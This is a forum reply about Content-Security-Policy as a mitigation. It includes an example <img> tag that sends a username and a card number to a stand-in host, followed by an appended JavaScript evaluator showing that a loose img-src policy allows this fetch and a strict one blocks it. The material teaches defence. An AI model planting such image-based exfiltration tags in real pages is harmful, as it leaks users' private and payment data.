Re: Possible mitigation?
The CSP will do this for you already. But you have to lock everything down. If, for example, you allow images from anywhere then I can exfiltrate data by including the image:
<img src="http://example.com/save-hacked-details/?user=brewsters-angle-grinder&credit-card=1234-0000-8000-1234&">
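Added example, not part of the post above and not the author's code: a small evaluator for the img-src directive of a Content-Security-Policy header, which makes the point concrete. It checks whether the image URL from the post would be fetched under a permissive policy (img-src *) versus a locked-down one (img-src 'self'). The page origin, the two policy strings and the helper names are assumptions for illustration; the matcher supports 'self', 'none', '*', scheme sources and host sources with an optional "*." prefix and port, and is a teaching model rather than a full CSP implementation.

```javascript
// Added example, not from the original post: a minimal CSP img-src evaluator
// showing why "img-src *" lets a page load (and so send data to) any host,
// while "img-src 'self'" limits images to the page's own origin.

const PAGE_ORIGIN = "https://app.example.org"; // constructed origin of the page

// Parse "directive src src; directive src" into a Map of directive -> sources.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) policy.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return policy;
}

// Effective port of a URL, filling in the scheme default when none is given.
function portOf(url) {
  return url.port || (url.protocol === "https:" ? "443" : "80");
}

// Does one CSP source expression match the URL, for a page at pageOrigin?
function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "*") return true; // (CSP3 excludes data:/blob:/filesystem: here; ignored in this model)
  if (s === "'self'") return url.origin === pageOrigin;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme source, e.g. "https:"
  // host source: [scheme://][*.]host[:port|:*]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  const pageScheme = new URL(pageOrigin).protocol;
  // Without an explicit scheme the page's scheme applies (https: is always acceptable).
  if (scheme) {
    if (url.protocol !== scheme + ":") return false;
  } else if (url.protocol !== pageScheme && url.protocol !== "https:") {
    return false;
  }
  if (wildcard ? !url.hostname.endsWith("." + host) : url.hostname !== host) return false;
  if (port && port !== "*" && portOf(url) !== port) return false;
  if (!port && url.port !== "") return false; // no port in source: only the scheme default matches
  return true;
}

// Is loading an image from urlString allowed under this CSP header?
// img-src falls back to default-src; with neither present, CSP does not restrict images.
function imageAllowed(header, urlString, pageOrigin = PAGE_ORIGIN) {
  const policy = parseCsp(header);
  const sources = policy.get("img-src") ?? policy.get("default-src");
  if (sources === undefined) return true;
  const url = new URL(urlString);
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

// The image URL from the post (its values are the post's own constructed sample data).
const EXFIL_IMG =
  "http://example.com/save-hacked-details/?user=brewsters-angle-grinder&credit-card=1234-0000-8000-1234&";
const LOOSE_CSP = "default-src 'self'; img-src *";       // images from anywhere: the fetch goes out
const STRICT_CSP = "default-src 'self'; img-src 'self'"; // images only from the page's own origin

console.log("loose policy allows the image:", imageAllowed(LOOSE_CSP, EXFIL_IMG));   // true
console.log("strict policy allows the image:", imageAllowed(STRICT_CSP, EXFIL_IMG)); // false
```

The fallback to default-src is the detail that bites in practice: a policy that sets default-src 'self' but then adds img-src * has reopened the image channel, so a review of a CSP should read each fetch directive on its own rather than trusting the default.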